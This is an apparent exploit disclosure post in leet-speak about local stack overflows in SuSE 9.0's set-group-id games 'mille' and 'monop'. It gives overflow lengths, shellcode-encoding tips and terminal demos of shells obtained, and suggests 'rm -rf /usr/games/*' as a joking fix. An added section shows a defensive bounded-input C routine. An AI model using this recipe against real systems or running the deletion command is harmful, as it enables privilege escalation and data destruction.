----- S3CTI0N 0x01 -----
-Bug : Suse 9.0 /usr/games/mille l0c4l l4m3 st4ck 0v3rfl0w.(Wh3n s4vin9 th3 g4m3).
Pr0gr4m suid3d t0 games wi7h d3f4ul7.
-3xpl0i747i0n :
  0x01-) m4nu4l-) 112 byt3s fil3n4m3 is 3n0ugh for m4nu4lly 3xpl0i747i0n. Us3 y0ur ASCII r3t 4ddr3ss for fil3n4m3.
  0x02-) 3xpl0i7-) Us3 Sh3llc0d3 which unfilt3rs '\x0b', '\n', '\x90', '\220' ch4r4ct3rs. XOR them. 'c4us3 mill3 c0nv3rts th4t shi77y ch4r4ct4rs to '~P'. 3sp3ci4lly 0x90 4nd \220. Us3 y0ur 0wn sh3llc0d3 in th3 4tt4ch3d c0d3.
-D3m0ns7r4ti0n:
[EMAIL PROTECTED]:~/c-hell$ ./env
RET = ���
[EMAIL PROTECTED]:~/c-hell$ /usr/games/mille
--HAND-- --DECK-- | ---- ---- -----
P 89 | Hand Total 0 0
1 75 --DISCARD-- | ----- -----
2 Go | Overall Total 0 0
3 Gasoline | Games 0 0
4 Repairs file: [non-printable filename input]
| p: pick q: quit
| u: use # o: order hand
| d: discard # s: save
| w: toggle window r: reprint
sh-2.05b$ uid=1001(addicted) gid=20(games) groups=100(users)
----- S3CTI0N 0x02 -----
-Bug : Suse 9.0 /usr/games/monop l0c4l l4m3 st4ck 0v3rfl0w. 7hiz iz 4n 0ld but g4m3 iz s7ill vuln3r4bl3.
0v3rfl0w in 1. pl4y3rn4m3. (4ls0 th3 0th3rs)
Pr0gr4m suid3d games by d3f4ul7
-3xpl0i747i0n :
  0x01-) m4nu4l-) 304 byt3s pl4y3rn4m3 is 3n0ugh f0r 3xpl0i747i0n. Us3 y0ur ASCII r3t 4ddr3ss.
  0x02-) 3xpl0i7-) Us3 sh3llc0d3 which is n0t c0nt4ins s0m3 ch4rs like '\x0b'. XOR them. 3xpl0i7 4tt4ch3d.
-D3m0nstr4ti0n:
[EMAIL PROTECTED]:~/c-hell$ ./env
RET = ���
[EMAIL PROTECTED]:~/c-hell$ /usr/games/monop
How many players? 1
Player 1's name: [non-printable player name input]
sh-2.05b$ id
uid=1001(addicted) gid=20(games) groups=100(users)
sh-2.05b$
----- S3C7I0N 0x03 -----
C0nclusi0n: Th3r3 4r3 t00 m4ny bin4ri3s s7ill vuln3r4bl3 t0 7his kind 0f bugz. Bu7 I'm t00 B0R3D.
Quick P4tch : rm -rf /usr/games/*
---------------------------------------------------------------------------------------------------------------------------------------
N4rK07IX
mille.c
Description: Binary data
monopexp.c
Description: Binary data
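
Added example, not part of the original post or its attachments: the kind of fix both bugs call for, a bounded line reader for the save-file name and player-name prompts that rejects over-long input instead of writing past a fixed stack buffer. The names `read_name`, `try_length` and the 64-byte limit are assumptions, since the post shows neither the games' source nor their buffer sizes; the 112- and 304-byte lengths tried are the ones quoted in the post.

```c
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 64   /* assumed limit; the real buffer sizes are not on the page */

/* Read one line from `in` into buf (capacity cap, including the NUL).
 * Returns the name length, or -1 on EOF, empty input or an over-long line.
 * An over-long line is drained so its tail is not taken as the next answer. */
int read_name(FILE *in, char *buf, size_t cap)
{
    size_t len, extra = 0;
    int c;

    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    len = strcspn(buf, "\n");
    if (buf[len] != '\n') {
        /* fgets stopped at cap-1 bytes (or EOF): count what is left on the line */
        while ((c = fgetc(in)) != EOF && c != '\n')
            extra++;
        if (extra > 0) {
            buf[0] = '\0';
            return -1;
        }
    }
    buf[len] = '\0';
    return len > 0 ? (int)len : -1;
}

/* Demo helper: feed n 'A' bytes plus a newline (constructed input) to read_name(). */
int try_length(size_t n)
{
    char name[NAME_MAX_LEN];
    FILE *in = tmpfile();
    int r;

    if (!in) return -2;
    while (n-- > 0) fputc('A', in);
    fputc('\n', in);
    rewind(in);
    r = read_name(in, name, sizeof name);
    fclose(in);
    return r;
}

int main(void)
{
    printf("10 -> %d, 112 -> %d, 304 -> %d\n", try_length(10), try_length(112), try_length(304));
    return 0;
}
```

Removing the set-id bit from games that do not need it limits the impact of any remaining overflow of this kind without deleting the binaries.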
